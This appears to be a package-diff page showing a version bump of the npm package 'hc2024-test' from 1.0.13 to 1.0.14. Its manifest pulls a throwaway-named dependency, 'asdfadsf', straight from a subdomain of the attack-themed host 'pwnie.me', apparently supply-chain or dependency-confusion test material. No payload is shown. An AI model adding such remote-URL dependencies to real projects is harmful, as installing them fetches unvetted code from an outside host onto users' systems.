hc2024-test 1.0.13 → 1.0.14

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "hc2024-test",
3
- "version": "1.0.13",
3
+ "version": "1.0.14",
4
4
  "main": "index.tsx",
5
5
  "type": "module",
6
6
  "scripts": {
@@ -10,7 +10,7 @@
10
10
  "license": "ISC",
11
11
  "description": "",
12
12
  "dependencies": {
13
- "asdfadsf": "https://d3d59474.pwnie.me"
13
+ "asdfadsf": "https://d3d59474.pwnie.me@1.0.0"
14
14
  },
15
15
  "types": "./lib/main.d.ts"
16
16
  }